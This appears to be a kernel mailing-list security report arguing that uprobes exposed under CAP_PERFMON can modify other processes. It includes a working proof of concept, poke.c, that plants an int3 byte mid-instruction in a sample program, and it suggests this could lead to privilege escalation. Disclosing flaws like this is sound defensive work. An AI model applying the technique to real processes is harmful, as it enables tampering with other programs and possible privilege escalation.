uprobes are destructive but exposed by perf under CAP_PERFMON
From: Jann Horn
Date: Tue Jul 01 2025 - 12:16:41 EST
Since commit c9e0924e5c2b ("perf/core: open access to probes for
CAP_PERFMON privileged process"), it is possible to create uprobes
through perf_event_open() when the caller has CAP_PERFMON. uprobes can
have destructive effects, while my understanding is that CAP_PERFMON
is supposed to only let you _read_ stuff (like registers and stack
memory) from other processes, but not modify their execution.

uprobes (at least on x86) can be destructive because they have no
protection against poking in the middle of an instruction; basically,
as long as the kernel manages to decode the instruction bytes at the
caller-specified offset as a relocatable instruction, a breakpoint
instruction (int3, byte 0xcc) can be installed at that offset, even if
the offset is not an instruction boundary.

This means uprobes can be used to alter what happens in another
process. It would probably be a good idea to go back to requiring
CAP_SYS_ADMIN for installing uprobes, unless we can get to a point
where the kernel can prove that the software breakpoint poke cannot
break the target process. (Which seems harder than doing it for
kprobes, since kprobes can at least rely on symbols to figure out
where a function starts...)

As a small example, in one terminal:
```
jannh@horn:~/test/perfmon-uprobepoke$ cat target.c
#include <unistd.h>
#include <stdio.h>
__attribute__((noinline))
void bar(unsigned long value) {
  printf("bar(0x%lx)\n", value);
}
__attribute__((noinline))
void foo(unsigned long value) {
  value += 0x90909090;
  bar(value);
}
void (*foo_ptr)(unsigned long value) = foo;
int main(void) {
  while (1) {
    printf("byte 1 of foo(): 0x%hhx\n",
           ((volatile unsigned char *)(void*)foo)[1]);
    foo_ptr(0);
    sleep(1);
  }
}
jannh@horn:~/test/perfmon-uprobepoke$ gcc -o target target.c -O3
jannh@horn:~/test/perfmon-uprobepoke$ objdump --disassemble=foo target
[...]
00000000000011b0 <foo>:
11b0: b8 90 90 90 90 mov $0x90909090,%eax
11b5: 48 01 c7 add %rax,%rdi
11b8: eb d6 jmp 1190 <bar>
[...]
jannh@horn:~/test/perfmon-uprobepoke$ ./target
byte 1 of foo(): 0x90
bar(0x90909090)
byte 1 of foo(): 0x90
bar(0x90909090)
byte 1 of foo(): 0x90
bar(0x90909090)
byte 1 of foo(): 0x90
bar(0x90909090)
```
and in another terminal:
```
jannh@horn:~/test/perfmon-uprobepoke$ cat poke.c
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <err.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <linux/perf_event.h>
int main(void) {
  /* look up the dynamic PMU type number of the uprobe event source */
  int uprobe_type;
  FILE *uprobe_type_file =
    fopen("/sys/bus/event_source/devices/uprobe/type", "r");
  if (uprobe_type_file == NULL)
    err(1, "fopen uprobe type");
  if (fscanf(uprobe_type_file, "%d", &uprobe_type) != 1)
    errx(1, "read uprobe type");
  fclose(uprobe_type_file);
  printf("uprobe type is %d\n", uprobe_type);

  /* find the file offset of foo() in ./target via nm */
  unsigned long target_off;
  FILE *pof = popen("nm target | grep ' foo$' | cut -d' ' -f1", "r");
  if (!pof)
    err(1, "popen nm");
  if (fscanf(pof, "%lx", &target_off) != 1)
    errx(1, "read target offset");
  pclose(pof);
  /* deliberately aim one byte into the first instruction of foo() */
  target_off += 1;
  printf("will poke at 0x%lx\n", target_off);

  struct perf_event_attr attr = {
    .type = uprobe_type,
    .size = sizeof(struct perf_event_attr),
    .sample_period = 100000,
    .sample_type = PERF_SAMPLE_IP,
    .uprobe_path = (unsigned long)"target",
    .probe_offset = target_off
  };
  /* pid=-1, cpu=0: all processes on CPU 0 */
  int perf_fd = syscall(__NR_perf_event_open, &attr, -1, 0, -1, 0);
  if (perf_fd == -1)
    err(1, "perf_event_open");
  /* 0x11000 = 1 metadata page + 16 data pages, assuming 4 KiB pages */
  char *map = mmap(NULL, 0x11000, PROT_READ, MAP_SHARED, perf_fd, 0);
  if (map == MAP_FAILED)
    err(1, "mmap error");
  printf("mmap success\n");
  /* keep the event (and with it the breakpoint) alive */
  while (1) pause();
}
jannh@horn:~/test/perfmon-uprobepoke$ gcc -o poke poke.c -Wall
jannh@horn:~/test/perfmon-uprobepoke$ sudo setcap cap_perfmon+pe poke
jannh@horn:~/test/perfmon-uprobepoke$ ./poke
uprobe type is 9
will poke at 0x11b1
mmap success
```
This results in the first terminal changing output as follows, showing
that 0xcc was written into the middle of the "mov" instruction,
modifying its immediate operand:
```
byte 1 of foo(): 0x90
bar(0x90909090)
byte 1 of foo(): 0x90
bar(0x90909090)
byte 1 of foo(): 0x90
bar(0x90909090)
byte 1 of foo(): 0xcc
bar(0x909090cc)
byte 1 of foo(): 0xcc
bar(0x909090cc)
```
It's probably possible to turn this into a privilege escalation by
doing things like clobbering part of the distance of a jump or call
instruction.